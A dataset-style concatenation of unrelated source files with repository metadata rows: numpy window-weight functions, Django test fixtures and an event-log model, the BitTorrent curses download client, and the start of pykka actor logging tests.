Hamming window filter.
Parameters
----------
radius : float32
Radius of the window.
distances : numpy.ndarray
Array with distances.
Returns
-------
weights : numpy.ndarray
Distance weights.
tw : float32
Sum of weigths.
"""
alpha = 0.54
weights = alpha + (1 - alpha) * np.cos(np.pi / radius * distances)
return weights, np.sum(weights)
def boxcar(radius, distance):
"""
Boxcar filter
Parameters
----------
n : int
Length.
Returns
-------
weights : numpy.ndarray
Distance weights.
tw : float32
Sum of weigths.
"""
weights = np.zeros(distance.size)
weights[distance <= radius] = 1.
return weights, np.sum(weights)
def get_window_weights(window, radius, distance, norm=False):
"""
Function returning weights for the provided window function
Parameters
----------
window : str
Window function name
radius : float
Radius of the window.
distance : numpy.ndarray
Distance array
norm : boolean
If true, normalised weights will be returned.
Returns
-------
weights : numpy.ndarray
Weights according to distances and given window function
"""
if window == 'hamming':
weights, w_sum = hamming_window(radius, distance)
elif window == 'boxcar':
weights, w_sum = boxcar(radius, distance)
else:
raise ValueError('Window name not supported.')
if norm is True:
weights = weights / w_sum
return weights
| 27.106145 | 77 | 0.647362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,742 | 0.771228 |
a4dade425c95d9b111ad44e99a5db732bfa49c43 | 1,592 | py | Python | project/tests/fixtures/fixture_data.py | hlystovea/resource_planner | 5ddbef31004a7e50201e1d414152a8090d1b0caf | [
"MIT"
] | null | null | null | project/tests/fixtures/fixture_data.py | hlystovea/resource_planner | 5ddbef31004a7e50201e1d414152a8090d1b0caf | [
"MIT"
] | null | null | null | project/tests/fixtures/fixture_data.py | hlystovea/resource_planner | 5ddbef31004a7e50201e1d414152a8090d1b0caf | [
"MIT"
] | null | null | null | import pytest
import tempfile
@pytest.fixture
def post(user):
from posts.models import Post
image = tempfile.NamedTemporaryFile(suffix=".jpg").name
return Post.objects.create(text='Тестовый пост 1', author=user, image=image)
@pytest.fixture
def group():
from posts.models import Group
return Group.objects.create(title='Тестовая группа 1', slug='test-link', description='Тестовое описание группы')
@pytest.fixture
def post_with_group(user, group):
from posts.models import Post
image = tempfile.NamedTemporaryFile(suffix=".jpg").name
return Post.objects.create(text='Тестовый пост 2', author=user, group=group, image=image)
@pytest.fixture
def storage_1():
from warehouse.models import Storage
return Storage.objects.create(name='storage_1')
@pytest.fixture
def storage_2():
from warehouse.models import Storage
return Storage.objects.create(name='storage_2')
@pytest.fixture
def material():
from warehouse.models import Material
return Material.objects.create(name='material')
@pytest.fixture
def instrument():
from warehouse.models import Instrument
return Instrument.objects.create(name='instrument')
@pytest.fixture
def material_in_storage_1(material, storage_1):
from warehouse.models import MaterialStorage
return MaterialStorage.objects.create(material=material, storage=storage_1, amount=2)
@pytest.fixture
def material_in_storage_2(material, storage_2):
from warehouse.models import MaterialStorage
return MaterialStorage.objects.create(material=material, storage=storage_2, amount=4)
| 26.983051 | 116 | 0.766332 | 0 | 0 | 0 | 0 | 1,595 | 0.965496 | 0 | 0 | 206 | 0.124697 |
a4db11ef5ed5b0211872ce11e6f5933e8efb3885 | 85 | py | Python | orm_skills/views.py | bluebamus/django_miscellaneous_book | 22e0851b3a07aeef94bb723b334f036ed5c17f72 | [
"MIT"
] | null | null | null | orm_skills/views.py | bluebamus/django_miscellaneous_book | 22e0851b3a07aeef94bb723b334f036ed5c17f72 | [
"MIT"
] | null | null | null | orm_skills/views.py | bluebamus/django_miscellaneous_book | 22e0851b3a07aeef94bb723b334f036ed5c17f72 | [
"MIT"
] | null | null | null | from django.shortcuts import render
# Create your views here.
def index():
pass
| 14.166667 | 35 | 0.729412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.294118 |
a4dc9a387c6801eebbce5ef0b1a99718dbb8697f | 17,584 | py | Python | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | #!/usr/bin/env python
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Original version written by Henry 'Pi' James, modified by (at least)
# John Hoffman and Uoti Urpala
from __future__ import division
from BitTorrent.platform import install_translation
install_translation()
SPEW_SCROLL_RATE = 1
import sys
import os
import threading
from time import time, strftime
from BitTorrent.download import Feedback, Multitorrent
from BitTorrent.defaultargs import get_defaults
from BitTorrent.parseargs import printHelp
from BitTorrent.zurllib import urlopen
from BitTorrent.bencode import bdecode
from BitTorrent.ConvertedMetainfo import ConvertedMetainfo
from BitTorrent.prefs import Preferences
from BitTorrent.obsoletepythonsupport import import_curses
from BitTorrent import configfile
from BitTorrent import BTFailure
from BitTorrent import version
from BitTorrent import GetTorrent
# Probe for the curses bindings up front: they are not shipped with the
# native Win32 build of Python, so fail early with an explanation instead
# of crashing somewhere inside the display code.
try:
    curses = import_curses()
    import curses.panel
    from curses.wrapper import wrapper as curses_wrapper
    from signal import signal, SIGWINCH
except:
    # NOTE(review): bare except also hides non-import failures here;
    # narrowing to ImportError would probably be safer -- confirm.
    print _("Textmode GUI initialization failed, cannot proceed.")
    print
    print _("This download interface requires the standard Python module "
            "\"curses\", which is unfortunately not available for the native "
            "Windows port of Python. It is however available for the Cygwin "
            "port of Python, running on all Win32 systems (www.cygwin.com).")
    print
    print _('You may still use "bittorrent-console" to download.')
    sys.exit(1)
def fmttime(n):
    """Format an ETA in seconds as a localized, human-readable string.

    Returns "download complete!" for 0, "<unknown>" for values that are
    not convertible to int or outside [0, 60 days), and otherwise
    "finishing in H:MM:SS".
    """
    if n == 0:
        return _("download complete!")
    try:
        n = int(n)
    except (TypeError, ValueError, OverflowError):
        # Not a usable number (e.g. None or inf) - ETA is unknown.
        return _("<unknown>")
    if n < 0 or n >= 5184000:  # 60 days
        # Previously an `assert` inside a bare except: the check vanished
        # under `python -O` and the except masked unrelated exceptions.
        # An explicit range test keeps the behaviour in all modes.
        return _("<unknown>")
    m, s = divmod(n, 60)
    h, m = divmod(m, 60)
    return _("finishing in %d:%02d:%02d") % (h, m, s)
def fmtsize(n):
    """Format a byte count with thousands separators, plus a rounded
    binary-unit suffix ("KiB", "MiB", ...) for values above 999 bytes."""
    # Build the comma-separated decimal representation by hand.
    s = str(n)
    size = s[-3:]
    while len(s) > 3:
        s = s[:-3]
        size = '%s,%s' % (s[-3:], size)
    if n > 999:
        unit = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
        i = 1
        # Shift down by whole-KiB steps while at least one more unit fits.
        while i + 1 < len(unit) and (n >> 10) >= 999:
            i += 1
            n >>= 10
        # Final division is a *true* division (the module does
        # `from __future__ import division`), giving a float for %.0f.
        n /= (1 << 10)
        size = '%s (%.0f %s)' % (size, n, unit[i])
    return size
class CursesDisplayer(object):
    """Curses textmode UI for a single torrent download.

    Lays out three panels: a label column, a field area with the current
    statistics, and a "spew" area showing either errors or the per-peer
    table.  `display()` is both the render loop and the keyboard handler.
    """
    def __init__(self, scrwin, errlist, doneflag, reread_config, ulrate):
        # scrwin: the top-level curses window; errlist: shared list the
        # caller prints after curses shuts down; doneflag: set to quit;
        # reread_config/ulrate: callbacks for the 'r' and 'u' keys.
        self.scrwin = scrwin
        self.errlist = errlist
        self.doneflag = doneflag
        # Rebuild the layout when the terminal is resized.
        signal(SIGWINCH, self.winch_handler)
        self.changeflag = threading.Event()
        self.done = False
        self.reread_config = reread_config
        self.ulrate = ulrate
        # Cached display strings, refreshed by display().
        self.activity = ''
        self.status = ''
        self.progress = ''
        self.downRate = '---'
        self.upRate = '---'
        self.shareRating = ''
        self.seedStatus = ''
        self.peerStatus = ''
        self.errors = []
        self.file = ''
        self.downloadTo = ''
        self.fileSize = ''
        self.numpieces = 0
        # State for scrolling the peer table one row per SPEW_SCROLL_RATE.
        self.spew_scroll_time = 0
        self.spew_scroll_pos = 0
        self._remake_window()
        curses.use_default_colors()
    def set_torrent_values(self, name, path, size, numpieces):
        """Record the torrent's static metadata and redraw the layout."""
        self.file = name
        self.downloadTo = path
        self.fileSize = fmtsize(size)
        self.numpieces = numpieces
        self._remake_window()
    def winch_handler(self, signum, stackframe):
        """SIGWINCH handler: re-create the screen at the new terminal size."""
        self.changeflag.set()
        curses.endwin()
        self.scrwin.refresh()
        self.scrwin = curses.newwin(0, 0, 0, 0)
        self._remake_window()
    def _remake_window(self):
        """(Re)build all sub-windows/panels and draw the static labels."""
        self.scrh, self.scrw = self.scrwin.getmaxyx()
        self.scrpan = curses.panel.new_panel(self.scrwin)
        # Fixed-size label column on the left.
        self.labelh, self.labelw, self.labely, self.labelx = 11, 9, 1, 2
        self.labelwin = curses.newwin(self.labelh, self.labelw,
                                      self.labely, self.labelx)
        self.labelpan = curses.panel.new_panel(self.labelwin)
        # Field area fills the rest of the width next to the labels.
        self.fieldh, self.fieldw, self.fieldy, self.fieldx = (
            self.labelh, self.scrw-2 - self.labelw-3,
            1, self.labelw+3)
        self.fieldwin = curses.newwin(self.fieldh, self.fieldw,
                                      self.fieldy, self.fieldx)
        # Non-blocking getch() so display() can poll the keyboard.
        self.fieldwin.nodelay(1)
        self.fieldpan = curses.panel.new_panel(self.fieldwin)
        # Spew area occupies everything below the labels/fields.
        self.spewh, self.speww, self.spewy, self.spewx = (
            self.scrh - self.labelh - 2, self.scrw - 3, 1 + self.labelh, 2)
        self.spewwin = curses.newwin(self.spewh, self.speww,
                                     self.spewy, self.spewx)
        self.spewpan = curses.panel.new_panel(self.spewwin)
        # ASCII border; may fail on tiny terminals, which is harmless.
        try:
            self.scrwin.border(ord('|'),ord('|'),ord('-'),ord('-'),ord(' '),ord(' '),ord(' '),ord(' '))
        except:
            pass
        self.labelwin.addstr(0, 0, _("file:"))
        self.labelwin.addstr(1, 0, _("size:"))
        self.labelwin.addstr(2, 0, _("dest:"))
        self.labelwin.addstr(3, 0, _("progress:"))
        self.labelwin.addstr(4, 0, _("status:"))
        self.labelwin.addstr(5, 0, _("dl speed:"))
        self.labelwin.addstr(6, 0, _("ul speed:"))
        self.labelwin.addstr(7, 0, _("sharing:"))
        self.labelwin.addstr(8, 0, _("seeds:"))
        self.labelwin.addstr(9, 0, _("peers:"))
        curses.panel.update_panels()
        curses.doupdate()
        self.changeflag.clear()
    def finished(self):
        """Mark the download complete and show the final state."""
        self.done = True
        self.downRate = '---'
        self.display({'activity':_("download succeeded"), 'fractionDone':1})
    def error(self, errormsg):
        """Record an error (timestamped) and refresh the screen."""
        newerrmsg = strftime('[%H:%M:%S] ') + errormsg
        # Only the first line is shown on screen; the full text goes to
        # the shared errlist for printing after exit.
        self.errors.append(newerrmsg.split('\n')[0])
        self.errlist.append(newerrmsg)
        self.display({})
    def display(self, statistics):
        """Render one frame from `statistics` and process pending keys.

        Recognized keys: ^L redraw, q/Q quit, r/R re-read config,
        u/U prompt for a new upload rate.
        """
        fractionDone = statistics.get('fractionDone')
        activity = statistics.get('activity')
        timeEst = statistics.get('timeEst')
        downRate = statistics.get('downRate')
        upRate = statistics.get('upRate')
        spew = statistics.get('spew')
        inchar = self.fieldwin.getch()
        if inchar == 12: # ^L
            self._remake_window()
        elif inchar in (ord('q'),ord('Q')):
            self.doneflag.set()
        elif inchar in (ord('r'),ord('R')):
            self.reread_config()
        elif inchar in (ord('u'),ord('U')):
            # Temporarily switch to blocking, echoed input to read the
            # new upload rate from the "ul speed" field position.
            curses.echo()
            self.fieldwin.nodelay(0)
            s = self.fieldwin.getstr(6,10)
            curses.noecho()
            self.fieldwin.nodelay(1)
            r = None
            try:
                r = int(s)
            except ValueError:
                pass
            if r is not None:
                self.ulrate(r)
        if timeEst is not None:
            self.activity = fmttime(timeEst)
        elif activity is not None:
            self.activity = activity
        # A resize is in progress; skip drawing into stale windows.
        if self.changeflag.isSet():
            return
        if fractionDone is not None:
            blocknum = int(self.fieldw * fractionDone)
            self.progress = blocknum * '#' + (self.fieldw - blocknum) * '_'
            self.status = '%s (%.1f%%)' % (self.activity, fractionDone * 100)
        if downRate is not None:
            self.downRate = '%.1f KB/s' % (downRate / (1 << 10))
        if upRate is not None:
            self.upRate = '%.1f KB/s' % (upRate / (1 << 10))
        downTotal = statistics.get('downTotal')
        if downTotal is not None:
            upTotal = statistics['upTotal']
            # Near-zero download shows an "infinite" share rating.
            if downTotal <= upTotal / 100:
                self.shareRating = _("oo (%.1f MB up / %.1f MB down)") % (
                    upTotal / (1<<20), downTotal / (1<<20))
            else:
                self.shareRating = _("%.3f (%.1f MB up / %.1f MB down)") % (
                    upTotal / downTotal, upTotal / (1<<20), downTotal / (1<<20))
            numCopies = statistics['numCopies']
            nextCopies = ', '.join(["%d:%.1f%%" % (a,int(b*1000)/10) for a,b in
                zip(xrange(numCopies+1, 1000), statistics['numCopyList'])])
            if not self.done:
                self.seedStatus = _("%d seen now, plus %d distributed copies"
                                    "(%s)") % (statistics['numSeeds' ],
                                               statistics['numCopies'],
                                               nextCopies)
            else:
                self.seedStatus = _("%d distributed copies (next: %s)") % (
                    statistics['numCopies'], nextCopies)
            self.peerStatus = _("%d seen now") % statistics['numPeers']
        self.fieldwin.erase()
        self.fieldwin.addnstr(0, 0, self.file, self.fieldw, curses.A_BOLD)
        self.fieldwin.addnstr(1, 0, self.fileSize, self.fieldw)
        self.fieldwin.addnstr(2, 0, self.downloadTo, self.fieldw)
        if self.progress:
            self.fieldwin.addnstr(3, 0, self.progress, self.fieldw, curses.A_BOLD)
        self.fieldwin.addnstr(4, 0, self.status, self.fieldw)
        self.fieldwin.addnstr(5, 0, self.downRate, self.fieldw)
        self.fieldwin.addnstr(6, 0, self.upRate, self.fieldw)
        self.fieldwin.addnstr(7, 0, self.shareRating, self.fieldw)
        self.fieldwin.addnstr(8, 0, self.seedStatus, self.fieldw)
        self.fieldwin.addnstr(9, 0, self.peerStatus, self.fieldw)
        self.spewwin.erase()
        if not spew:
            # No peer table: use the spew area to show accumulated errors.
            errsize = self.spewh
            if self.errors:
                self.spewwin.addnstr(0, 0, _("error(s):"), self.speww, curses.A_BOLD)
                errsize = len(self.errors)
            displaysize = min(errsize, self.spewh)
            displaytop = errsize - displaysize
            for i in range(displaysize):
                self.spewwin.addnstr(i, self.labelw, self.errors[displaytop + i],
                                     self.speww-self.labelw-1, curses.A_BOLD)
        else:
            if self.errors:
                self.spewwin.addnstr(0, 0, _("error:"), self.speww, curses.A_BOLD)
                self.spewwin.addnstr(0, self.labelw, self.errors[-1],
                                     self.speww-self.labelw-1, curses.A_BOLD)
            self.spewwin.addnstr(2, 0, _(" # IP Upload Download Completed Speed"), self.speww, curses.A_BOLD)
            # Advance the scroll position at most once per SPEW_SCROLL_RATE
            # seconds, and only when the table is too tall to fit.
            if self.spew_scroll_time + SPEW_SCROLL_RATE < time():
                self.spew_scroll_time = time()
                if len(spew) > self.spewh-5 or self.spew_scroll_pos > 0:
                    self.spew_scroll_pos += 1
            if self.spew_scroll_pos > len(spew):
                self.spew_scroll_pos = 0
            for i in range(len(spew)):
                spew[i]['lineno'] = i+1
            # Sentinel row marks the wrap-around point of the rotation.
            spew.append({'lineno': None})
            spew = spew[self.spew_scroll_pos:] + spew[:self.spew_scroll_pos]
            for i in range(min(self.spewh - 5, len(spew))):
                if not spew[i]['lineno']:
                    continue
                self.spewwin.addnstr(i+3, 0, '%3d' % spew[i]['lineno'], 3)
                self.spewwin.addnstr(i+3, 4, spew[i]['ip'], 15)
                # Upload column: rate plus Interested/Choked flags.
                ul = spew[i]['upload']
                if ul[1] > 100:
                    self.spewwin.addnstr(i+3, 20, '%6.0f KB/s' % (
                        ul[1] / 1000), 11)
                self.spewwin.addnstr(i+3, 32, '-----', 5)
                if ul[2]:
                    self.spewwin.addnstr(i+3, 33, 'I', 1)
                if ul[3]:
                    self.spewwin.addnstr(i+3, 35, 'C', 1)
                # Download column: rate plus I/C/Snubbed flags.
                dl = spew[i]['download']
                if dl[1] > 100:
                    self.spewwin.addnstr(i+3, 38, '%6.0f KB/s' % (
                        dl[1] / 1000), 11)
                self.spewwin.addnstr(i+3, 50, '-------', 7)
                if dl[2]:
                    self.spewwin.addnstr(i+3, 51, 'I', 1)
                if dl[3]:
                    self.spewwin.addnstr(i+3, 53, 'C', 1)
                if dl[4]:
                    self.spewwin.addnstr(i+3, 55, 'S', 1)
                self.spewwin.addnstr(i+3, 58, '%5.1f%%' % (int(spew[i]['completed']*1000)/10), 6)
                if spew[i]['speed'] is not None:
                    self.spewwin.addnstr(i+3, 64, '%5.0f KB/s' % (spew[i]['speed']/1000), 10)
            self.spewwin.addnstr(self.spewh-1, 0,
                    _("downloading %d pieces, have %d fragments, "
                      "%d of %d pieces completed") %
                    (statistics['storage_active'], statistics['storage_dirty'],
                     statistics['storage_numcomplete'], self.numpieces),
                    self.speww-1)
        curses.panel.update_panels()
        curses.doupdate()
class DL(Feedback):
    """Drives one download: wires a Multitorrent to the curses displayer
    and implements the Feedback callbacks."""
    def __init__(self, metainfo, config, errlist):
        self.doneflag = threading.Event()
        self.metainfo = metainfo
        self.config = Preferences().initWithDict(config)
        self.errlist = errlist
    def run(self, scrwin):
        """Main entry, invoked via curses.wrapper with the screen window."""
        def reread():
            # Hop onto the rawserver thread before touching config.
            self.multitorrent.rawserver.external_add_task(self.reread_config,0)
        def ulrate(value):
            self.multitorrent.set_option('max_upload_rate', value)
            self.torrent.set_option('max_upload_rate', value)
        self.d = CursesDisplayer(scrwin, self.errlist, self.doneflag, reread, ulrate)
        try:
            self.multitorrent = Multitorrent(self.config, self.doneflag,
                                            self.global_error)
            # raises BTFailure if bad
            metainfo = ConvertedMetainfo(bdecode(self.metainfo))
            torrent_name = metainfo.name_fs
            # NOTE(review): the lines below read the module-level `config`
            # global, not self.config (a Preferences object) - verify this
            # is intentional before refactoring.
            if config['save_as']:
                if config['save_in']:
                    raise BTFailure(_("You cannot specify both --save_as and "
                                      "--save_in"))
                saveas = config['save_as']
            elif config['save_in']:
                saveas = os.path.join(config['save_in'], torrent_name)
            else:
                saveas = torrent_name
            self.d.set_torrent_values(metainfo.name, os.path.abspath(saveas),
                                metainfo.total_bytes, len(metainfo.hashes))
            self.torrent = self.multitorrent.start_torrent(metainfo,
                                Preferences(self.config), self, saveas)
        except BTFailure, e:
            # NOTE(review): appends to the module-level `errlist`, not
            # self.errlist (they are the same list when run from __main__).
            errlist.append(str(e))
            return
        # Kick off the periodic status refresh, then block in the event loop.
        self.get_status()
        self.multitorrent.rawserver.install_sigint_handler()
        self.multitorrent.rawserver.listen_forever()
        self.d.display({'activity':_("shutting down"), 'fractionDone':0})
        self.torrent.shutdown()
    def reread_config(self):
        """Reload the config file and push new values to the torrent."""
        try:
            newvalues = configfile.get_config(self.config, 'bittorrent-curses')
        except Exception, e:
            self.d.error(_("Error reading config: ") + str(e))
            return
        self.config.update(newvalues)
        # The set_option call can potentially trigger something that kills
        # the torrent (when writing this the only possibility is a change in
        # max_files_open causing an IOError while closing files), and so
        # the self.failed() callback can run during this loop.
        for option, value in newvalues.iteritems():
            self.multitorrent.set_option(option, value)
        for option, value in newvalues.iteritems():
            self.torrent.set_option(option, value)
    def get_status(self):
        """Poll torrent status and redraw; reschedules itself each interval."""
        self.multitorrent.rawserver.add_task(self.get_status,
                                             self.config['display_interval'])
        status = self.torrent.get_status(self.config['spew'])
        self.d.display(status)
    def global_error(self, level, text):
        self.d.error(text)
    def error(self, torrent, level, text):
        self.d.error(text)
    def failed(self, torrent, is_external):
        # Torrent died; unblock listen_forever().
        self.doneflag.set()
    def finished(self, torrent):
        self.d.finished()
if __name__ == '__main__':
    # Parse CLI args/config, resolve the .torrent source, then run the
    # curses UI and finally print any errors collected during the run.
    uiname = 'bittorrent-curses'
    defaults = get_defaults(uiname)
    metainfo = None
    if len(sys.argv) <= 1:
        printHelp(uiname, defaults)
        sys.exit(1)
    try:
        config, args = configfile.parse_configuration_and_args(defaults,
                                       uiname, sys.argv[1:], 0, 1)
        torrentfile = None
        if len(args):
            torrentfile = args[0]
        # Legacy options still work but warn; they override the positional arg.
        for opt in ('responsefile', 'url'):
            if config[opt]:
                print '"--%s"' % opt, _("deprecated, do not use")
                torrentfile = config[opt]
        if torrentfile is not None:
            metainfo, errors = GetTorrent.get(torrentfile)
            if errors:
                raise BTFailure(_("Error reading .torrent file: ") + '\n'.join(errors))
        else:
            raise BTFailure(_("you must specify a .torrent file"))
    except BTFailure, e:
        print str(e)
        sys.exit(1)
    # Shared with DL so errors survive curses teardown and can be printed.
    errlist = []
    dl = DL(metainfo, config, errlist)
    # curses_wrapper restores the terminal even if dl.run raises.
    curses_wrapper(dl.run)
    if errlist:
        print _("These errors occurred during execution:")
        for error in errlist:
            print error
| 38.988914 | 145 | 0.556187 | 13,656 | 0.776615 | 0 | 0 | 0 | 0 | 0 | 0 | 2,816 | 0.160146 |
a4de856ef997ed99088a6be0601cf0f3605b3a54 | 5,551 | py | Python | event_log/models/entry.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 13 | 2015-11-29T12:19:12.000Z | 2021-02-21T15:42:11.000Z | event_log/models/entry.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 23 | 2015-04-29T19:43:34.000Z | 2021-02-10T05:50:17.000Z | event_log/models/entry.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 11 | 2015-09-20T18:59:00.000Z | 2020-02-07T08:47:34.000Z | from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
# Shared kwargs for the sparse target foreign keys on Entry: each target is
# optional, and the log entry survives deletion of its target (SET_NULL).
TARGET_FKEY_ATTRS = dict(
    null=True,
    blank=True,
    on_delete=models.SET_NULL,
)
class Entry(models.Model):
    """A single event-log entry.

    Carries a free-form `entry_type` string, request context, and a sparse
    set of foreign keys to the object(s) the event concerns.  Presentation
    (message, e-mail subject/body) is delegated to the entry-type metadata
    looked up from the registry.
    """
    created_at = models.DateTimeField(auto_now_add=True, db_index=True)
    created_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
    )
    entry_type = models.CharField(max_length=255)
    context = models.CharField(
        max_length=1024,
        blank=True,
        default='',
        verbose_name=_('Context'),
        help_text=_('The URL of the view in which the event occurred.'),
    )
    ip_address = models.CharField(
        max_length=48,
        blank=True,
        default='',
        verbose_name=_('IP address'),
        help_text=_('The IP address this action was performed from.'),
    )
    # various target fkeys, sparse
    event = models.ForeignKey('core.Event', **TARGET_FKEY_ATTRS)
    person = models.ForeignKey('core.Person', **TARGET_FKEY_ATTRS)
    organization = models.ForeignKey('core.Organization', **TARGET_FKEY_ATTRS)
    feedback_message = models.ForeignKey('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)
    event_survey_result = models.ForeignKey('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)
    global_survey_result = models.ForeignKey('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)
    search_term = models.CharField(max_length=255, blank=True, default='')
    # we should probably have shoved them in a jsonfield in the first place
    other_fields = JSONField(blank=True, default=dict)
    @property
    def survey_result(self):
        """
        Shortcut for templates etc. that apply to both GlobalSurveyResults and EventSurveyResults.
        """
        return self.event_survey_result if self.event_survey_result else self.global_survey_result
    @property
    def cbac_claims(self):
        """Render the CBAC claims from other_fields as "key=value, ..."."""
        return ", ".join(f"{key}={value}" for (key, value) in self.other_fields.get("claims", {}).items())
    @property
    def signup(self):
        """The labour Signup linking this entry's event and person, or None."""
        from labour.models import Signup
        if not self.event or not self.person:
            return None
        try:
            return Signup.objects.get(event=self.event, person=self.person)
        except Signup.DoesNotExist:
            return None
    def send_updates(self):
        """Deliver this entry to every active Subscription whose filters match."""
        from .subscription import Subscription
        q = Q(entry_type=self.entry_type, active=True)
        # TODO need a more flexible filter solution that does not hard-code these
        # One option would be to specify filter = JSONField in Subscription.
        # Implementing this filter would require a client-side check or one SQL query
        # per Subscription, however, as we query Subscriptions by Entry and not vice versa.
        if self.event:
            # Implement the event filter. Subscriptions without event_filter receive updates from
            # all events. Subscriptions with event_filter receive only updates from that event.
            q &= Q(event_filter=self.event) | Q(event_filter__isnull=True)
        if self.event_survey_result:
            # Implement event survey filter.
            survey = self.event_survey_result.survey
            q &= Q(event_survey_filter=survey) | Q(event_survey_filter__isnull=True)
        if self.event and self.person:
            # Implement job category filter
            from labour.models import Signup
            try:
                signup = Signup.objects.get(event=self.event, person=self.person)
            except Signup.DoesNotExist:
                pass
            else:
                q &= (
                    Q(job_category_filter__in=signup.job_categories.all()) |
                    Q(job_category_filter__in=signup.job_categories_accepted.all()) |
                    Q(job_category_filter__isnull=True)
                )
        for subscription in Subscription.objects.filter(q):
            subscription.send_update_for_entry(self)
    @property
    def entry_type_metadata(self):
        """Lazily resolve and cache this entry type's registry metadata."""
        if not hasattr(self, '_entry_type_metadata'):
            from .. import registry
            self._entry_type_metadata = registry.get(self.entry_type)
        return self._entry_type_metadata
    @property
    def email_reply_to(self):
        """Reply-To address; metadata value may be a callable taking the entry."""
        meta = self.entry_type_metadata
        if callable(meta.email_reply_to):
            return meta.email_reply_to(self)
        else:
            return meta.email_reply_to
    @property
    def message(self):
        """Human-readable message; metadata supplies a callable or a template."""
        meta = self.entry_type_metadata
        if callable(meta.message):
            return meta.message(self)
        else:
            return meta.message.format(entry=self)
    @property
    def email_subject(self):
        """Subject line: the message prefixed with the installation name."""
        return '[{app_name}] {message}'.format(
            app_name=settings.KOMPASSI_INSTALLATION_NAME,
            message=self.message,
        )
    @property
    def email_body(self):
        """Body text; metadata supplies a callable or a template path to render."""
        meta = self.entry_type_metadata
        if callable(meta.email_body_template):
            return meta.email_body_template(self)
        else:
            return render_to_string(meta.email_body_template, dict(
                entry=self,
                settings=settings,
            ))
    class Meta:
        verbose_name = _('log entry')
        verbose_name_plural = _('log entries')
        ordering = ('-created_at',)
| 34.265432 | 106 | 0.652135 | 5,202 | 0.937128 | 0 | 0 | 1,894 | 0.3412 | 0 | 0 | 1,108 | 0.199604 |
a4df32bb4d4e2f16c17a67995348e36cb2171d81 | 7,202 | py | Python | tests/logging_test.py | lykme516/pykka | d66b0c49658fc0e7c4e1ae46a0f9c50c7e964ca5 | [
"Apache-2.0"
] | 1 | 2021-01-03T09:25:23.000Z | 2021-01-03T09:25:23.000Z | tests/logging_test.py | hujunxianligong/pykka | d66b0c49658fc0e7c4e1ae46a0f9c50c7e964ca5 | [
"Apache-2.0"
] | null | null | null | tests/logging_test.py | hujunxianligong/pykka | d66b0c49658fc0e7c4e1ae46a0f9c50c7e964ca5 | [
"Apache-2.0"
] | null | null | null | import logging
import threading
import unittest
from pykka import ActorRegistry, ThreadingActor
from tests import TestLogHandler
from tests.actor_test import (
EarlyFailingActor, FailingOnFailureActor, LateFailingActor)
class LoggingNullHandlerTest(unittest.TestCase):
    """Checks that importing pykka attaches a NullHandler to its logger."""
    def test_null_handler_is_added_to_avoid_warnings(self):
        pykka_logger = logging.getLogger('pykka')
        handler_types = (type(handler).__name__ for handler in pykka_logger.handlers)
        self.assertTrue(any(name == 'NullHandler' for name in handler_types))
class ActorLoggingTest(object):
    """Mixin with tests for pykka's logging of actor failures.

    Concrete subclasses (built by ConcreteActorLoggingTest) must provide
    `event_class` plus the actor classes `AnActor`, `EarlyFailingActor`,
    `LateFailingActor` and `FailingOnFailureActor` bound to one backend.
    """
    def setUp(self):
        # Start the actor under test and capture all root-logger output.
        self.on_stop_was_called = self.event_class()
        self.on_failure_was_called = self.event_class()
        self.actor_ref = self.AnActor.start(
            self.on_stop_was_called, self.on_failure_was_called)
        self.actor_proxy = self.actor_ref.proxy()
        self.log_handler = TestLogHandler(logging.DEBUG)
        self.root_logger = logging.getLogger()
        self.root_logger.addHandler(self.log_handler)
    def tearDown(self):
        self.log_handler.close()
        ActorRegistry.stop_all()
    def test_unexpected_messages_are_logged(self):
        self.actor_ref.ask({'unhandled': 'message'})
        self.log_handler.wait_for_message('warning')
        with self.log_handler.lock:
            self.assertEqual(1, len(self.log_handler.messages['warning']))
            log_record = self.log_handler.messages['warning'][0]
        self.assertEqual(
            'Unexpected message received by %s' % self.actor_ref,
            log_record.getMessage().split(': ')[0])
    def test_exception_is_logged_when_returned_to_caller(self):
        try:
            self.actor_proxy.raise_exception().get()
            self.fail('Should raise exception')
        except Exception:
            pass
        self.log_handler.wait_for_message('debug')
        with self.log_handler.lock:
            self.assertEqual(1, len(self.log_handler.messages['debug']))
            log_record = self.log_handler.messages['debug'][0]
        self.assertEqual(
            'Exception returned from %s to caller:' % self.actor_ref,
            log_record.getMessage())
        self.assertEqual(Exception, log_record.exc_info[0])
        self.assertEqual('foo', str(log_record.exc_info[1]))
    def test_exception_is_logged_when_not_reply_requested(self):
